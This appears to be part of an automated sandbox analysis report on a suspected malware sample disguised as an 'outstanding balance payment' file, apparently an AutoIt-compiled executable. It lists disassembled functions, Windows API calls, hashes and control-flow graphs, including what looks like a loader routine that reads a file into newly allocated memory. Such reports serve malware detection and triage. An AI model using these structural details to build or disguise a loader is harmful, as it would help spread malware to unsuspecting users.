                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                  • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                  • API String ID: 2641332412-570651680
                                                                  • Opcode ID: 92e024630aaf674d323e9a71a9b8943ff0143685c8cde98f5a7f780a803d480e
                                                                  • Instruction ID: 7664212dbbe4b1f36ba29ce7e97c0f160cc492903eddf1353694269a8d26dc41
                                                                  • Opcode Fuzzy Hash: 92e024630aaf674d323e9a71a9b8943ff0143685c8cde98f5a7f780a803d480e
                                                                  • Instruction Fuzzy Hash: FD62E374525345DFDB25EF24C885B6AB7E8BF44304F04097EEA468B2D2DBB0E858CB52
                                                                  Function 002B5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ___createFile.LIBCMT ref: 002B5EC3
                                                                  • ___createFile.LIBCMT ref: 002B5F04
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002B5F2D
                                                                  • __dosmaperr.LIBCMT ref: 002B5F34
                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 002B5F47
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002B5F6A
                                                                  • __dosmaperr.LIBCMT ref: 002B5F73
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002B5F7C
                                                                  • __set_osfhnd.LIBCMT ref: 002B5FAC
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B6016
                                                                  • __close_nolock.LIBCMT ref: 002B603C
                                                                  • __chsize_nolock.LIBCMT ref: 002B606C
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B607E
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B6176
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B618B
                                                                  • __close_nolock.LIBCMT ref: 002B61EB
                                                                    • Part of subcall function 002AEA9C: CloseHandle.KERNELBASE(00000000,0032EEF4,00000000,?,002B6041,0032EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002AEAEC
                                                                    • Part of subcall function 002AEA9C: GetLastError.KERNEL32(?,002B6041,0032EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002AEAF6
                                                                    • Part of subcall function 002AEA9C: __free_osfhnd.LIBCMT ref: 002AEB03
                                                                    • Part of subcall function 002AEA9C: __dosmaperr.LIBCMT ref: 002AEB25
                                                                    • Part of subcall function 002A7C0E: __getptd_noexit.LIBCMT ref: 002A7C0E
                                                                  • __lseeki64_nolock.LIBCMT ref: 002B620D
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002B6342
                                                                  • ___createFile.LIBCMT ref: 002B6361
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002B636E
                                                                  • __dosmaperr.LIBCMT ref: 002B6375
                                                                  • __free_osfhnd.LIBCMT ref: 002B6395
                                                                  • __invoke_watson.LIBCMT ref: 002B63C3
                                                                  • __wsopen_helper.LIBCMT ref: 002B63DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                  • String ID: @
                                                                  • API String ID: 3896587723-2766056989
                                                                  • Opcode ID: a2ea65a483bab6d3e7e25b700a472b00a2e767b730e7aecff7510eee960de28b
                                                                  • Instruction ID: 670edc7ee5ee1356baa5f85cfefe5c8d16d23e440f2474c1275ef1c50da7c57e
                                                                  • Opcode Fuzzy Hash: a2ea65a483bab6d3e7e25b700a472b00a2e767b730e7aecff7510eee960de28b
                                                                  • Instruction Fuzzy Hash: 502247719306179BEB299F68CC49BFD7B61EB01394F284229E9219B2D1C7398D70CB51
                                                                  Function 002CFA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • _wcscpy.LIBCMT ref: 002CFA96
                                                                  • _wcschr.LIBCMT ref: 002CFAA4
                                                                  • _wcscpy.LIBCMT ref: 002CFABB
                                                                  • _wcscat.LIBCMT ref: 002CFACA
                                                                  • _wcscat.LIBCMT ref: 002CFAE8
                                                                  • _wcscpy.LIBCMT ref: 002CFB09
                                                                  • __wsplitpath.LIBCMT ref: 002CFBE6
                                                                  • _wcscpy.LIBCMT ref: 002CFC0B
                                                                  • _wcscpy.LIBCMT ref: 002CFC1D
                                                                  • _wcscpy.LIBCMT ref: 002CFC32
                                                                  • _wcscat.LIBCMT ref: 002CFC47
                                                                  • _wcscat.LIBCMT ref: 002CFC59
                                                                  • _wcscat.LIBCMT ref: 002CFC6E
                                                                    • Part of subcall function 002CBFA4: _wcscmp.LIBCMT ref: 002CC03E
                                                                    • Part of subcall function 002CBFA4: __wsplitpath.LIBCMT ref: 002CC083
                                                                    • Part of subcall function 002CBFA4: _wcscpy.LIBCMT ref: 002CC096
                                                                    • Part of subcall function 002CBFA4: _wcscat.LIBCMT ref: 002CC0A9
                                                                    • Part of subcall function 002CBFA4: __wsplitpath.LIBCMT ref: 002CC0CE
                                                                    • Part of subcall function 002CBFA4: _wcscat.LIBCMT ref: 002CC0E4
                                                                    • Part of subcall function 002CBFA4: _wcscat.LIBCMT ref: 002CC0F7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$t23
                                                                  • API String ID: 2955681530-867710975
                                                                  • Opcode ID: 1c872aa5b743d5db04ed68679537591cf81485d438e64a2b68c037cb6a055e4e
                                                                  • Instruction ID: 0420eb9324a07c7e991b463124d0294a596c9133a5d717c0e8fc022d7debd4a9
                                                                  • Opcode Fuzzy Hash: 1c872aa5b743d5db04ed68679537591cf81485d438e64a2b68c037cb6a055e4e
                                                                  • Instruction Fuzzy Hash: 9D91C472524705AFCB11EF50C991F9AB3E9BF48310F04496EF94997292DB30EA64CF91
                                                                  Function 002CBFA4 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 316fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 002CBDB4: __time64.LIBCMT ref: 002CBDBE
                                                                    • Part of subcall function 00284517: _fseek.LIBCMT ref: 0028452F
                                                                  • __wsplitpath.LIBCMT ref: 002CC083
                                                                    • Part of subcall function 002A1DFC: __wsplitpath_helper.LIBCMT ref: 002A1E3C
                                                                  • _wcscpy.LIBCMT ref: 002CC096
                                                                  • _wcscat.LIBCMT ref: 002CC0A9
                                                                  • __wsplitpath.LIBCMT ref: 002CC0CE
                                                                  • _wcscat.LIBCMT ref: 002CC0E4
                                                                  • _wcscat.LIBCMT ref: 002CC0F7
                                                                  • _wcscmp.LIBCMT ref: 002CC03E
                                                                    • Part of subcall function 002CC56D: _wcscmp.LIBCMT ref: 002CC65D
                                                                    • Part of subcall function 002CC56D: _wcscmp.LIBCMT ref: 002CC670
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002CC2A1
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002CC338
                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 002CC34E
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002CC35F
                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002CC371
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                  • String ID: p1#v`K$v
                                                                  • API String ID: 2378138488-1068180069
                                                                  • Opcode ID: d01464813ac3726b0efae3cf507ab2c81f67d90ae03c217fdbbfe1e5eac036b2
                                                                  • Instruction ID: 0df795534c4406294bfa1c58dd4802c42f9d7f4f29d45d936bceb9f6e6600037
                                                                  • Opcode Fuzzy Hash: d01464813ac3726b0efae3cf507ab2c81f67d90ae03c217fdbbfe1e5eac036b2
                                                                  • Instruction Fuzzy Hash: 67C138B1D10219ABDF11EF95CC81FDEBBBCAF49310F1041AAF609E6151DB709A948F61
                                                                  Function 00283F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00283F86
                                                                  • RegisterClassExW.USER32(00000030), ref: 00283FB0
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00283FC1
                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00283FDE
                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00283FEE
                                                                  • LoadIconW.USER32(000000A9), ref: 00284004
                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00284013
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: a4ca5d7b62b8d5bf65e3bf9493cefd7821da831253cefb4bd91946494209b66f
                                                                  • Instruction ID: 960a4fc401bc291abbac4450cce0b6dd90f518becb9e19dfb97df80475565843
                                                                  • Opcode Fuzzy Hash: a4ca5d7b62b8d5bf65e3bf9493cefd7821da831253cefb4bd91946494209b66f
                                                                  • Instruction Fuzzy Hash: EC21C9B9901718AFDB02DFE4EC89BCDBBB8FB09704F01411AF915AA2A0D7B555848F91
                                                                  Function 00283742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 962 283742-283762 964 2837c2-2837c4 962->964 965 283764-283767 962->965 964->965 966 2837c6 964->966 967 2837c8 965->967 968 283769-283770 965->968 969 2837ab-2837b3 DefWindowProcW 966->969 970 2837ce-2837d1 967->970 971 2f1e00-2f1e2e call 282ff6 call 29e312 967->971 972 28382c-283834 PostQuitMessage 968->972 973 283776-28377b 968->973 980 2837b9-2837bf 969->980 974 2837d3-2837d4 970->974 975 2837f6-28381d SetTimer RegisterWindowMessageW 970->975 1009 2f1e33-2f1e3a 971->1009 979 2837f2-2837f4 972->979 977 2f1e88-2f1e9c call 2c4ddd 973->977 978 283781-283783 973->978 981 2837da-2837ed KillTimer call 283847 call 28390f 974->981 982 2f1da3-2f1da6 974->982 975->979 984 28381f-28382a CreatePopupMenu 975->984 977->979 1003 2f1ea2 977->1003 985 283789-28378e 978->985 986 283836-283840 call 29eb83 978->986 979->980 981->979 988 2f1ddc-2f1dfb MoveWindow 982->988 989 2f1da8-2f1daa 982->989 984->979 992 2f1e6d-2f1e74 985->992 993 283794-283799 985->993 1004 283845 986->1004 988->979 996 2f1dac-2f1daf 989->996 997 2f1dcb-2f1dd7 SetFocus 989->997 992->969 999 2f1e7a-2f1e83 call 2ba5f3 992->999 1001 2f1e58-2f1e68 call 2c55bd 993->1001 1002 28379f-2837a5 993->1002 996->1002 1005 2f1db5-2f1dc6 call 282ff6 996->1005 997->979 999->969 1001->979 1002->969 1002->1009 1003->969 1004->979 1005->979 1009->969 1013 2f1e40-2f1e53 call 283847 call 284ffc 1009->1013 1013->969
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 002837B3
                                                                  • KillTimer.USER32(?,00000001), ref: 002837DD
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00283800
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0028380B
                                                                  • CreatePopupMenu.USER32 ref: 0028381F
                                                                  • PostQuitMessage.USER32(00000000), ref: 0028382E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: 9cb322b561efcf9a7dfdcb23a117f7d3bf9a6337baf0473c3e14c23db45850ea
                                                                  • Instruction ID: 3d94fe15de9706493a8c680f050390282c916617e653bccdac3e18bf773838e4
                                                                  • Opcode Fuzzy Hash: 9cb322b561efcf9a7dfdcb23a117f7d3bf9a6337baf0473c3e14c23db45850ea
                                                                  • Instruction Fuzzy Hash: 3A4138FD13260AA7DB16FF68EC49B7A7A99F701B40F400125FA02DA1D1DA65EDB08721
                                                                  Function 00283E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00283E79
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00283E88
                                                                  • LoadIconW.USER32(00000063), ref: 00283E9E
                                                                  • LoadIconW.USER32(000000A4), ref: 00283EB0
                                                                  • LoadIconW.USER32(000000A2), ref: 00283EC2
                                                                    • Part of subcall function 00284024: LoadImageW.USER32(00280000,00000063,00000001,00000010,00000010,00000000), ref: 00284048
                                                                  • RegisterClassExW.USER32(?), ref: 00283F30
                                                                    • Part of subcall function 00283F53: GetSysColorBrush.USER32(0000000F), ref: 00283F86
                                                                    • Part of subcall function 00283F53: RegisterClassExW.USER32(00000030), ref: 00283FB0
                                                                    • Part of subcall function 00283F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00283FC1
                                                                    • Part of subcall function 00283F53: InitCommonControlsEx.COMCTL32(?), ref: 00283FDE
                                                                    • Part of subcall function 00283F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00283FEE
                                                                    • Part of subcall function 00283F53: LoadIconW.USER32(000000A9), ref: 00284004
                                                                    • Part of subcall function 00283F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00284013
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: e0bf956525783b466c2e573b716d8cc3eec6492222fbb9aceff0cb7a9f9692f5
                                                                  • Instruction ID: 6f0b858c17a24ca33d6ef387c069909002ab78dbc3263266118fc25838307470
                                                                  • Opcode Fuzzy Hash: e0bf956525783b466c2e573b716d8cc3eec6492222fbb9aceff0cb7a9f9692f5
                                                                  • Instruction Fuzzy Hash: 6521B8B8D00304AFCB52DFE9EC45A9ABFF9FB09714F00411AE204AB2A0DB745580CF91
                                                                  Function 01227DD8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1026 1227dd8-1227e86 call 1225808 1029 1227e8d-1227eb3 call 1228ce8 CreateFileW 1026->1029 1032 1227eb5 1029->1032 1033 1227eba-1227eca 1029->1033 1034 1228005-1228009 1032->1034 1038 1227ed1-1227eeb VirtualAlloc 1033->1038 1039 1227ecc 1033->1039 1036 122804b-122804e 1034->1036 1037 122800b-122800f 1034->1037 1040 1228051-1228058 1036->1040 1041 1228011-1228014 1037->1041 1042 122801b-122801f 1037->1042 1043 1227ef2-1227f09 ReadFile 1038->1043 1044 1227eed 1038->1044 1039->1034 1045 122805a-1228065 1040->1045 1046 12280ad-12280c2 1040->1046 1041->1042 1047 1228021-122802b 1042->1047 1048 122802f-1228033 1042->1048 1053 1227f10-1227f50 VirtualAlloc 1043->1053 1054 1227f0b 1043->1054 1044->1034 1055 1228067 1045->1055 1056 1228069-1228075 1045->1056 1049 12280d2-12280da 1046->1049 1050 12280c4-12280cf VirtualFree 1046->1050 1047->1048 1051 1228043 1048->1051 1052 1228035-122803f 1048->1052 1050->1049 1051->1036 1052->1051 1057 1227f52 1053->1057 1058 1227f57-1227f72 call 1228f38 1053->1058 1054->1034 1055->1046 1059 1228077-1228087 1056->1059 1060 1228089-1228095 1056->1060 1057->1034 1066 1227f7d-1227f87 1058->1066 1062 12280ab 1059->1062 1063 12280a2-12280a8 1060->1063 1064 1228097-12280a0 1060->1064 1062->1040 1063->1062 1064->1062 1067 1227fba-1227fce call 1228d48 1066->1067 1068 1227f89-1227fb8 call 1228f38 1066->1068 1074 1227fd2-1227fd6 1067->1074 1075 1227fd0 1067->1075 1068->1066 1076 1227fe2-1227fe6 1074->1076 1077 1227fd8-1227fdc CloseHandle 1074->1077 1075->1034 1078 1227ff6-1227fff 1076->1078 1079 1227fe8-1227ff3 VirtualFree 1076->1079 1077->1076 1078->1029 1078->1034 1079->1078
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01227EA9
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 012280CF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2147125259.0000000001225000.00000040.00000020.00020000.00000000.sdmp, Offset: 01225000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_1225000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                  • Instruction ID: 4c7f82b61474bbf3a6039f9aa2776e89aa663d6cc366c2dffdf4d6bc4a77b34c
                                                                  • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                  • Instruction Fuzzy Hash: 54A11B70E14219EBDB14CFA4C899BEEBBB5FF48304F208159E605BB281D7799A41CF64
                                                                  Function 002849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1135 2849fb-284a25 call 28bcce RegOpenKeyExW 1138 2f41cc-2f41e3 RegQueryValueExW 1135->1138 1139 284a2b-284a2f 1135->1139 1140 2f4246-2f424f RegCloseKey 1138->1140 1141 2f41e5-2f4222 call 29f4ea call 2847b7 RegQueryValueExW 1138->1141 1146 2f423d-2f4245 call 2847e2 1141->1146 1147 2f4224-2f423b call 286a63 1141->1147 1146->1140 1147->1146
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00284A1D
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 002F41DB
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 002F421A
                                                                  • RegCloseKey.ADVAPI32(?), ref: 002F4249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseOpen
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                  • API String ID: 1586453840-614718249
                                                                  • Opcode ID: 02708be1f36c311ecdb9def3be2272e2cf6f6ecdaeab8318d2da41407665ce4f
                                                                  • Instruction ID: 4748d23f9978b480093f5bc090c5a19176ba52abd646062b6e85352f375cb79c
                                                                  • Opcode Fuzzy Hash: 02708be1f36c311ecdb9def3be2272e2cf6f6ecdaeab8318d2da41407665ce4f
                                                                  • Instruction Fuzzy Hash: 14119D75A11109BFEB05ABA4CD96DFF7BACEF04344F000029B506D6191EAB09E519B50
                                                                  Function 002836B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1162 2836b8-283728 CreateWindowExW * 2 ShowWindow * 2
                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 002836E6
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00283707
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00283AA3,?), ref: 0028371B
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00283AA3,?), ref: 00283724
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: 698483619a148131cdffe40f178cc697ece20e081bebc0158b4867c20b5fcfc0
                                                                  • Instruction ID: 9d800a1b2af05b4ed02e8e913c63c9501062b34cbaf832b58b86322dbc96f012
                                                                  • Opcode Fuzzy Hash: 698483619a148131cdffe40f178cc697ece20e081bebc0158b4867c20b5fcfc0
                                                                  • Instruction Fuzzy Hash: 8AF0DA795806D07AE7325B97AC08E672E7DD7C7F24F00001BBA04AA1A0C96528D5DAB1
                                                                  Function 01227BB8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
